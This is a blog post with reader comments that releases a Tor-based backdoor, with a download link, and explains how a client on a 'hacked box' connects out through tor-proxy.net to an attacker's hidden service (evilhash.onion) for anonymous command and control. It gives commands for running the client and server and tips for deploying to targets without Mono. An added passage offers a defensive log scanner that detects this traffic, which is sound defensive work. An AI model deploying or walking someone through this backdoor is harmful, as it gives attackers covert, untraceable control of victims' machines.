Hello all,
It took me a week to recover from Vegas, but I am here now, and I am releasing the Tor backdoor talked about in Vegas. It is a bit rudimentary, but it is also very nice if you want to hide.
I hope people find it useful, if nothing else as a place to start for a more robust backdoor.
http://blog.attackresearch.com/publications/metaphish/Alpha_tor_shell.ta...
What this gives you:
1) an encrypted command and control channel out of the victim network
2) anonymity: no one knows who is controlling the client
3) cross platform: works on Unix if Mono is installed
a) installed by default on Ubuntu/Debian
Email me with questions: dkerb@attackresearch.com.

Comments
WoW it's really implemented
Now this is very hot stuff. I blogged about this a while back:
http://diablohorn.wordpress.com/2008/12/27/untracable-connect-back/
Never thought this would actually end up existing. Very nice work.
DiabloHorn
More explanation, finally.
I was supposed to have this out last week, but I have to admit I was avoiding it. I am not much of a writer.
The basic concept of this backdoor is to take advantage of the www.tor-proxy.net service, which lets regular HTTP(S) requests reach the Tor network without Tor being installed on the target. The server/client relationship here is a bit strange, so I am going to try to illustrate it with ASCII art.
Client (hacked box)
|
talks over HTTPS
|
V
tor-proxy.net
|
Talks over tor to hidden server
|
V
server (attacker)
The idea is that the connection is initiated from the target, outbound through the firewall, to a hidden service whose location no one can resolve. This gives the attacker a very high level of anonymity.
What this needs to run:
On Windows, the .NET Framework 1.1; if you are running the server on Windows (the attacker side), you will also need Tor set up with a hidden service.
On Linux you need Mono, at least on one machine. If the target doesn't have Mono, read up on mkbundle2, which will produce a binary that doesn't require Mono but is large. Depending on your setup, you may need to run:
mono ./tor_client.....
This should work on Mac, but I don't have one to test with easily.
Running tor_client
I am assuming that the server is set up correctly and, for this example, that your Tor hidden service name is evilhash.onion.
On linux:
mono ./Tor_Client.exe http://evilhash.onion
-or, if Mono is set up to run .NET binaries automatically-
./Tor_Client.exe http://evilhash.onion
On Windows:
Tor_Client.exe http://evilhash.onion
The traffic going to tor-proxy.net at this point is all HTTPS-encrypted; only someone able to break the encryption, or tor-proxy.net itself if it were monitoring (it terminates the TLS connection), would see requests similar to:
http://tor-proxy.net/proxy/tor/browse.php?u=http%3A%2F%2Fevilhash.onion%...
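Added example, not from the original post or from the tool's author: a small Python scanner a defender could run over web-proxy logs to spot exactly the pattern just described, a request to tor-proxy.net whose u= parameter decodes to a .onion URL. The log format, client IPs and .onion names are constructed for the example; tor-proxy.net is the only gateway hostname the post names, and the other hostnames are placeholders. It generalizes slightly beyond the post: any query parameter on any host that decodes to a .onion URL is flagged, not only the gateway's browse.php, since other web-to-Tor gateways follow the same shape.

```python
"""Flag web-to-Tor gateway traffic in proxy logs.

Added example (not part of the original post). It looks for the pattern the
post describes: an HTTP(S) request to a Tor web gateway such as tor-proxy.net
whose `u` query parameter carries a URL-encoded .onion address. The log format
below is a constructed, simplified one (timestamp, client IP, method, URL,
status); adapt parse_line() to your proxy's real format.
"""
from urllib.parse import urlsplit, parse_qs

# Gateway hostnames to watch. tor-proxy.net is the one named in the post;
# extend with any others your environment sees.
TOR_GATEWAYS = {"tor-proxy.net", "www.tor-proxy.net"}

# Constructed sample log lines (not real traffic). The .onion addresses and
# 'other-gateway.example' are placeholders.
SAMPLE_LOG = """\
2009-08-18T10:00:01 10.0.0.15 GET http://www.example.com/index.html 200
2009-08-18T10:00:02 10.0.0.15 GET http://tor-proxy.net/proxy/tor/browse.php?u=http%3A%2F%2Fevilhash.onion%2Fcmd 200
2009-08-18T10:00:03 10.0.0.22 GET https://tor-proxy.net/ 200
2009-08-18T10:00:04 10.0.0.15 POST http://tor-proxy.net/proxy/tor/browse.php?u=http%3A%2F%2Fevilhash.onion%2Fout 200
2009-08-18T10:00:05 10.0.0.31 GET http://other-gateway.example/go?u=http%3A%2F%2Fabcdefghijklmnop.onion%2F 200
"""


def parse_line(line):
    """Split one constructed log line into its five fields; None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, status = parts
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status}


def embedded_onion_host(url):
    """Return the .onion hostname hidden in any query parameter of `url`, or None.

    The gateway in the post passes the target as ?u=<url-encoded http://x.onion/...>.
    parse_qs percent-decodes each value; we then parse it as a URL and check its host.
    """
    query = urlsplit(url).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            host = (urlsplit(value).hostname or "").lower()
            if host.endswith(".onion"):
                return host
    return None


def classify(entry):
    """Return a label for a parsed entry, or None if nothing looks suspicious.

    'gateway+onion' : known gateway host plus an embedded .onion target (the post's pattern)
    'onion-param'   : .onion target embedded via some other host (generalisation)
    'gateway'       : known gateway host with no .onion visible (e.g. its landing page)
    """
    host = (urlsplit(entry["url"]).hostname or "").lower()
    onion = embedded_onion_host(entry["url"])
    is_gateway = host in TOR_GATEWAYS
    if is_gateway and onion:
        return "gateway+onion"
    if onion:
        return "onion-param"
    if is_gateway:
        return "gateway"
    return None


def scan(log_text):
    """Scan log text; return a list of (client, label, onion_host_or_None) for each hit."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            hits.append((entry["client"], label, embedded_onion_host(entry["url"])))
    return hits


def clients_by_hit_count(hits):
    """Count hits per client so a host that keeps polling the gateway stands out."""
    counts = {}
    for client, _, _ in hits:
        counts[client] = counts.get(client, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(clients_by_hit_count(found))
```

Because the backdoor polls the gateway for commands, the same client showing up repeatedly with the `gateway+onion` label is the stronger signal; a single `gateway` hit may just be someone visiting the site. Where the proxy logs only the hostname (for example CONNECT entries for HTTPS), the query string is not available and the check degrades to the gateway-host match alone.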
Running the Server
This is where the attacker types commands, and the output comes back. Just run the Tor_Server command with no arguments.
Hope this helps some. I will try and be more responsive in the future.
Testing
I tested it with Windows and it works really incredibly. You did a good job! Now I want to try it with Debian.
Thank you for everything
Little more detailed post this weekend
So you definitely need Mono. This is installed on Ubuntu and most newer Debians. I will have some better build instructions this weekend. I did test on a couple of different Ubuntu versions, and on Windows with .NET installed, and it worked well. I didn't try Debian. You might want to try apt-get install mono, and then try running 'mono server'.
I will have more this weekend.
proxy
Would this be an HTTPS connection from the victim's machine using his browser? I suppose not. Just thinking of a scenario where the victim might reside behind a firewall and an on-site proxy server. The firewall will block the user's HTTPS request, but the proxy will be allowed (normally).
John
hehehe, I'm also sure that he tested it! But I can't use it... do you know how I can execute it in Debian? I have Tor installed but I don't know if I need something else...
John
Of course! But I can't use it. Do you know how the server can work in Debian? How can I execute it?
thanks
I'm pretty sure Dave has
I'm pretty sure Dave has tested it extensively :-)
Testing
Has anyone tested this backdoor? Does it really work? Because then it could be really interesting.